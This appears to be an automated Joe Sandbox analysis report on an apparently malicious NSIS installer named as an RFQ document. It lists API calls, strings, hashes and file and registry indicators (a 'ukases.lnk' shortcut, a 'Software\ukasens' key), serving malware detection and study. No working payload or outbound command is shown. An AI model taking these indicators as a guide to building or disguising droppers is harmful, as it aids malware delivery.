Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(000A05D1,00000064,000A1E60), ref: 00402FE1
wsprintfW.USER32 ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58

Uniqueness

Uniqueness Score: -1.00%

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
wsprintfW.USER32 ref: 00404DF7
SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A

Strings

%u.%u%s%s, xrefs: 00404DD8

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
Instruction ID: 33e626053c854acaf0ea976fdeb40ece7b69d158cb37adfcb571004cb6629101
Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
Instruction Fuzzy Hash: 2C11EB7360412877DB00666DAC46EAE329DDF85334F250237FA66F31D5EA79C92242E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405DF0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
lstrcatW.KERNEL32(?,0040A014), ref: 00405E12

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: dcf52917e326d6ada13c2a72ecce68a7b96b6e8782615359caad44c872c99b85
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: EBD05EB1101634AAC2116B48AC04CDF62AC9E86704381402AF141B20A6C7785D6296ED

Uniqueness

Uniqueness Score: -1.00%

Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Program Files (x86)\Common Files\ukases.lnk), ref: 0040269A

Strings

Software\ukasens\, xrefs: 00402688
C:\Program Files (x86)\Common Files\ukases.lnk, xrefs: 0040265E, 00402683, 00402695, 004026E1

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: lstrlen
String ID: C:\Program Files (x86)\Common Files\ukases.lnk$Software\ukasens\
API String ID: 1659193697-4188657868
Opcode ID: 457cedb22ed2f7019c5e446f23c2104e1a0fd1eea80a96ba194a72848a41722a
Instruction ID: 24c820640bf83c35ca015f911653a3ecbd9f7363fc1a8715c972f2d02b23d4ac
Opcode Fuzzy Hash: 457cedb22ed2f7019c5e446f23c2104e1a0fd1eea80a96ba194a72848a41722a
Instruction Fuzzy Hash: 11113A72A40311BBCB00BBB19E46EAE36709F50748F60443FF402F61C0D6FD4991565E

Uniqueness

Uniqueness Score: -1.00%

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32 ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
Instruction ID: fc94ebd698381dfc42c8ec832a7b78cf8da54aaf5e1058e2af7a384a9ccf94d3
Opcode Fuzzy Hash: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
Instruction Fuzzy Hash: 0FF05471602621ABC6306F50BD08A9B7E69FB44B53F41087AF045B11A9CB7548828B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00405EF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E

Part of subcall function 00405E9B: CharNextW.USER32(?,?,00425710,?,00405F0F,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"), ref: 00405EA9
Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6

lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"), ref: 00405F51
GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405EF8

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3081826266
Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE

Uniqueness

Uniqueness Score: -1.00%

Function 0040551A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405549
CallWindowProcW.USER32(?,?,?,?), ref: 0040559A

Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE

Strings

, xrefs: 0040552A

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
Instruction ID: 85372f17a9103eb01fcdfd8a19690b8d052d76dd043ca16804f8a0d8951f02ed
Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
Instruction Fuzzy Hash: 53017171200609BFDF309F51DD80AAB362AFB84750F540437FA047A1D5C7B98D52AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00403B5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
GlobalFree.KERNEL32(00000000), ref: 00403B7F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B5E

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E42
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E52

Strings

C:\Users\user\Desktop, xrefs: 00405E3C

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: eba18341e72c17137544591cfc51a7e4cac6184970473274e9d14fc4341c5a90
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: 29D0A7F3400A30DAC3127708EC00D9F77ACEF16700746443AE580A7165D7785D818AEC

Uniqueness

Uniqueness Score: -1.00%

Function 00405F76 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 5688, Parent PID: 6744COMMON

Executed Functions

Function 072ACDB8 Relevance: 19.2, Strings: 14, Instructions: 1706COMMON

